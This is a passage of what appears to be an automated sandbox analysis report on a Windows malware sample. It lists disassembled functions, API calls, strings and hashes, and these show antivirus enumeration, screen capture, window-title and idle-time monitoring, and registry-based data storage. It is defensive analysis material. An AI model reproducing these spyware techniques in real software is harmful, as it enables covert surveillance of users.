                                                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                            • API String ID: 1221949200-1583895642
                                                                                                                            • Opcode ID: ee91c994abcff073e179f067043bff218321890f214606375d41ae207d94f664
                                                                                                                            • Instruction ID: a42193fefc78c23e1df2f0e75eeae02e56bdacaa955b2eac429d9665e15b6b0f
                                                                                                                            • Opcode Fuzzy Hash: ee91c994abcff073e179f067043bff218321890f214606375d41ae207d94f664
                                                                                                                            • Instruction Fuzzy Hash: 7181A6F1A00228AFDB20DB54CC54FAEBBB8EB49704F044598F719A7245D7B49E80CF64
                                                                                                                            Function 03625F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03625F66
                                                                                                                            • GetLastError.KERNEL32 ref: 03625F6E
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 03625F85
                                                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03625F90
                                                                                                                            • GetLastError.KERNEL32 ref: 03625F92
                                                                                                                            • _memset.LIBCMT ref: 03625FB9
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 03625FC6
                                                                                                                            • lstrcmpW.KERNEL32(?,03645328), ref: 03625FED
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 03625FF8
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 03626005
                                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0362600F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                            • String ID: 2024.12. 3$key$open
                                                                                                                            • API String ID: 2922109467-4129338558
                                                                                                                            • Opcode ID: 4b12f9f0c27b8d4370d181441378c35371965e2be24388abf31f461904779e72
                                                                                                                            • Instruction ID: dc4cbc0c93d620497df83a8db524dff24407671a1b5f82d2e9f854dc5272b050
                                                                                                                            • Opcode Fuzzy Hash: 4b12f9f0c27b8d4370d181441378c35371965e2be24388abf31f461904779e72
                                                                                                                            • Instruction Fuzzy Hash: 86212676E047159BD720EF60ED45B5ABBA8AB84600F150818F7059B2C4EBB1E505CFA7
                                                                                                                            Function 036262B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 814 36262b6-36262bd 815 36262c0-3626363 call 3636770 wsprintfW RegOpenKeyExW 814->815 818 36263e9-36263ff 815->818 819 3626369-3626376 call 3636770 815->819 822 3626402-3626404 818->822 821 362637b-36263ba RegQueryValueExW 819->821 823 36263dc-36263e3 RegCloseKey 821->823 824 36263bc-36263da lstrcatW * 2 821->824 822->815 825 362640a-3626418 822->825 823->818 824->823 826 3626422-362642f lstrlenW 825->826 827 362641a-362641f 825->827 828 3626441-3626450 826->828 829 3626431-362643b lstrcatW 826->829 827->826 830 3626452-3626457 828->830 831 362645a-362647a call 362f00a 828->831 829->828 830->831
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 036262CE
                                                                                                                            • wsprintfW.USER32 ref: 03626336
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0362635F
                                                                                                                            • _memset.LIBCMT ref: 03626376
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 036263B2
                                                                                                                            • lstrcatW.KERNEL32(03651F10,?), ref: 036263CE
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364535C), ref: 036263DA
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 036263E3
                                                                                                                            • lstrlenW.KERNEL32(03651F10,?,95401134,00000AD4,00000000,75BF73E0), ref: 03626427
                                                                                                                            • lstrcatW.KERNEL32(03651F10,036453D4,?,95401134,00000AD4,00000000,75BF73E0), ref: 0362643B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                            • API String ID: 1671694837-1583895642
                                                                                                                            • Opcode ID: 6945e88204b7cfa5acfa1a164dea9ec25bce1a4150c7119dc49ef7b281131d6e
                                                                                                                            • Instruction ID: e42a49162ec81f699ade8816e85ba6d48217d9fe7afa91b6e9a264d2c9c79d6d
                                                                                                                            • Opcode Fuzzy Hash: 6945e88204b7cfa5acfa1a164dea9ec25bce1a4150c7119dc49ef7b281131d6e
                                                                                                                            • Instruction Fuzzy Hash: 004192F1A40628AFDB24DB50CC94FEEB7B8AF49705F1441C8F749A7182D6B49A80CF64
                                                                                                                            Function 0362C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,?,95401134,?,00000000,?), ref: 0362C09E
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0362C0AA
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0362C0BF
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0362C0D5
                                                                                                                            • EnterCriticalSection.KERNEL32(0364FB64), ref: 0362C113
                                                                                                                            • LeaveCriticalSection.KERNEL32(0364FB64), ref: 0362C124
                                                                                                                              • Part of subcall function 03629DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03629E04
                                                                                                                              • Part of subcall function 03629DE0: GdipDisposeImage.GDIPLUS(?), ref: 03629E18
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0362C14C
                                                                                                                              • Part of subcall function 0362A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0362A48D
                                                                                                                              • Part of subcall function 0362A460: _free.LIBCMT ref: 0362A503
                                                                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 0362C16D
                                                                                                                            • GlobalLock.KERNEL32(?), ref: 0362C177
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0362C18F
                                                                                                                              • Part of subcall function 03629BA0: DeleteObject.GDI32(?), ref: 03629BD2
                                                                                                                              • Part of subcall function 03629BA0: EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BE3
                                                                                                                              • Part of subcall function 03629BA0: EnterCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629BF8
                                                                                                                              • Part of subcall function 03629BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03629B7B), ref: 03629C04
                                                                                                                              • Part of subcall function 03629BA0: LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C15
                                                                                                                              • Part of subcall function 03629BA0: LeaveCriticalSection.KERNEL32(0364FB64,?,?,?,03629B7B), ref: 03629C1C
                                                                                                                            • GlobalSize.KERNEL32(00000000), ref: 0362C1A5
                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 0362C221
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0362C249
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1483550337-0
                                                                                                                            • Opcode ID: 68e273080509fda7f354754f79616ab9c5f0afc7b125fe92bb7682917067bfce
                                                                                                                            • Instruction ID: 0068bc04cdae3aad5ca5aeda56d422185b19716fc566ab749c73d00fe383cece
                                                                                                                            • Opcode Fuzzy Hash: 68e273080509fda7f354754f79616ab9c5f0afc7b125fe92bb7682917067bfce
                                                                                                                            • Instruction Fuzzy Hash: 136138B9D00618AFCB10EFA9D89499EBBB8FF89700F21452DF915AB244DB319901CF64
                                                                                                                            Function 03626490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 036264C2
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 036264E2
                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03626524
                                                                                                                            • _memset.LIBCMT ref: 03626560
                                                                                                                            • _memset.LIBCMT ref: 0362658E
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265BA
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265C3
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 036265D5
                                                                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03626625
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 03626635
                                                                                                                            Strings
                                                                                                                            • Software\Tencent\Plugin\VAS, xrefs: 036264D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                                                                            • API String ID: 2921034913-3343197220
                                                                                                                            • Opcode ID: 9b3fbbceb1401f418db515e5be129e1880f6e2071de21a69950dacdc3c72b31b
                                                                                                                            • Instruction ID: 907ccbe9940600c0c6790dd1e052b0fa51bdc42ff4cfc3edfeb30141c1410eaa
                                                                                                                            • Opcode Fuzzy Hash: 9b3fbbceb1401f418db515e5be129e1880f6e2071de21a69950dacdc3c72b31b
                                                                                                                            • Instruction Fuzzy Hash: 1241B6F5E40218ABD724DB50CD85FEAB77DDB44700F1045D9F309BB145EAB0AA858F68
                                                                                                                            Function 0362A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0362A48D
                                                                                                                            • _malloc.LIBCMT ref: 0362A4D1
                                                                                                                            • _free.LIBCMT ref: 0362A503
                                                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0362A522
                                                                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0362A594
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0362A59F
                                                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0362A5C5
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 0362A5DD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                            • String ID: &
                                                                                                                            • API String ID: 2794124522-3042966939
                                                                                                                            • Opcode ID: 5dc44f984ec9db5553efae9dd0463a327d691c467be644ae5d4f1e16980effcc
                                                                                                                            • Instruction ID: 8a54a99503c1901948599420c98ee31090088fafd463c69963dd9c059d372ced
                                                                                                                            • Opcode Fuzzy Hash: 5dc44f984ec9db5553efae9dd0463a327d691c467be644ae5d4f1e16980effcc
                                                                                                                            • Instruction Fuzzy Hash: 8D5173B5D006259FDB04DFE4C9449EFBBB8AF48700F164119E905BB250DB74A905CFA5
                                                                                                                            Function 02C352B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C35382
                                                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C35392
                                                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C4C6E0,000012A0), ref: 02C353B0
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C353BB
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C3540F
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C3541B
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C35434
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                                                            • API String ID: 864241144-2243437601
                                                                                                                            • Opcode ID: 590be30e2bb1598bf09f06780996881e2b0d7a8e5bc6d2c8902c39f6cd16650b
                                                                                                                            • Instruction ID: aa0ec8cb7a1ade4da01d60b36a8375aab662dfd0cd1607d8488cac6cd680281c
                                                                                                                            • Opcode Fuzzy Hash: 590be30e2bb1598bf09f06780996881e2b0d7a8e5bc6d2c8902c39f6cd16650b
                                                                                                                            • Instruction Fuzzy Hash: 98416A716842409FD3528F348849F7BBBE5AB99384FCC0D58E589DB142D7B0DA06C7D2
                                                                                                                            Function 02C352D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C35382
                                                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C35392
                                                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C4C6E0,000012A0), ref: 02C353B0
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C353BB
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C3540F
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C3541B
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C35434
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                                                            • API String ID: 864241144-2243437601
                                                                                                                            • Opcode ID: de38a6dd0355358b67f9362f022dc088ee3289f49be9a8e9698660e97f364f12
                                                                                                                            • Instruction ID: ffa287f13e363e302c8e567ea504b65c8d0f6e554ade237b9744b8a2acfd4d07
                                                                                                                            • Opcode Fuzzy Hash: de38a6dd0355358b67f9362f022dc088ee3289f49be9a8e9698660e97f364f12
                                                                                                                            • Instruction Fuzzy Hash: C431C6346843819FD762CB308408B7B7BE5AB99384FDC0C48E5899B142C7B0D616C791
                                                                                                                            Function 0362CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,036412F8,95401134,00000001,00000000,00000000), ref: 0362CAB1
                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(036412F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0362CAE0
                                                                                                                            • _memset.LIBCMT ref: 0362CB44
                                                                                                                            • _memset.LIBCMT ref: 0362CB53
                                                                                                                            • RegEnumValueW.KERNEL32(036412F8,?,00000000,?,00000000,?,00000000,?), ref: 0362CB72
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F756
                                                                                                                              • Part of subcall function 0362F707: std::exception::exception.LIBCMT ref: 0362F770
                                                                                                                              • Part of subcall function 0362F707: __CxxThrowException@8.LIBCMT ref: 0362F781
                                                                                                                            • RegCloseKey.KERNEL32(036412F8,?,?,?,?,?,?,?,?,?,?,?,00000000,036412F8,000000FF), ref: 0362CC83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                            • String ID: Console\0
                                                                                                                            • API String ID: 1348767993-1253790388
                                                                                                                            • Opcode ID: dd08e7580865a943b343e9ecd85a9c28174cca47e1ae4348a75b36eacbce344d
                                                                                                                            • Instruction ID: f0d807d1355eb1d1ddc67bd3184b37c5751527e1910029d6d4cb95375321a1df
                                                                                                                            • Opcode Fuzzy Hash: dd08e7580865a943b343e9ecd85a9c28174cca47e1ae4348a75b36eacbce344d
                                                                                                                            • Instruction Fuzzy Hash: B8613CB5E00618AFCB04DFA8D880EAEBBB8FF49710F15416EE915EB345D7359901CBA4
                                                                                                                            Function 0362BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362BB21
                                                                                                                            • GetLastInputInfo.USER32(?), ref: 0362BB37
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362BB3D
                                                                                                                            • wsprintfW.USER32 ref: 0362BB66
                                                                                                                            • GetForegroundWindow.USER32 ref: 0362BB6F
                                                                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0362BB83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                            • String ID: %d min
                                                                                                                            • API String ID: 3754759880-1947832151
                                                                                                                            • Opcode ID: 496352892d1b2f4e48fea92b6f922530e3c5dc34d64b71bf95a0252d477bdb49
                                                                                                                            • Instruction ID: 4aabf52597a08e64de481884f75d4f7dac6f21ab67854382b1df9cafe3497d0b
                                                                                                                            • Opcode Fuzzy Hash: 496352892d1b2f4e48fea92b6f922530e3c5dc34d64b71bf95a0252d477bdb49
                                                                                                                            • Instruction Fuzzy Hash: 7141A4B5E00218AFCB10DFA4D988E9FBBB8EF45710F198568F9099B345D7749A04CBE1
                                                                                                                            Function 03626910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(95401134,00000000,00000000,75BF73E0,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626938
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626947
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 03626960
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,036410DB,000000FF,?,03626AB3,00000000), ref: 0362696B
                                                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 036269BE
                                                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 036269CC
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,036410DB,000000FF), ref: 03626A2E
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,036410DB,000000FF), ref: 03626A34
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 429299433-0
                                                                                                                            • Opcode ID: 1046b2bdeda782ba66cf1f64e42633d7501ea1b2227e11b106f66bba20192703
                                                                                                                            • Instruction ID: f941987e177571727aaa144130690cd4837d84c62f57483a69d88b8cb8884dd8
                                                                                                                            • Opcode Fuzzy Hash: 1046b2bdeda782ba66cf1f64e42633d7501ea1b2227e11b106f66bba20192703
                                                                                                                            • Instruction Fuzzy Hash: 4F41E6B6D006299BCB10DFA9CD40AAEFBF8FB44700F25462AE915E7344D7B559008BA4
                                                                                                                            Function 03626D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03626DD9
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,03645164,00000000,00020019,75BF73E0), ref: 03626DFC
                                                                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03626E4A
                                                                                                                            • lstrcmpW.KERNEL32(?,03645148), ref: 03626E60
                                                                                                                            • lstrcpyW.KERNEL32(036256EA,?), ref: 03626E72
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: GROUP
                                                                                                                            • API String ID: 2102619503-2593425013
                                                                                                                            • Opcode ID: 9298a88e72d448070fb0ec399794742b497204abce480bbb1904fe34641bd3d2
                                                                                                                            • Instruction ID: 65bd94c6915575321ae620c35ff27274d91386729a99f697ae117968ed84ec03
                                                                                                                            • Opcode Fuzzy Hash: 9298a88e72d448070fb0ec399794742b497204abce480bbb1904fe34641bd3d2
                                                                                                                            • Instruction Fuzzy Hash: B231AA71904329BFDB20DF90DD89BDEBBB8FB08710F100299E515A7290DBB49A40CF54
                                                                                                                            Function 02C3721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C37240
                                                                                                                            • __calloc_crt.LIBCMT ref: 02C3724C
                                                                                                                            • __getptd.LIBCMT ref: 02C37259
                                                                                                                            • CreateThread.KERNEL32(?,?,02C371B6,00000000,?,?), ref: 02C37290
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C3729A
                                                                                                                            • _free.LIBCMT ref: 02C372A3
                                                                                                                            • __dosmaperr.LIBCMT ref: 02C372AE
                                                                                                                              • Part of subcall function 02C3710D: __getptd_noexit.LIBCMT ref: 02C3710D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 155776804-0
                                                                                                                            • Opcode ID: 4f5b92379ffc907122ee000bfe557db2bceb5321fda3d616119a78bcc773067c
                                                                                                                            • Instruction ID: c286a0ada968e3ca8e95a64e656937b2230b9f1022515e00f0cecf577fabe808
                                                                                                                            • Opcode Fuzzy Hash: 4f5b92379ffc907122ee000bfe557db2bceb5321fda3d616119a78bcc773067c
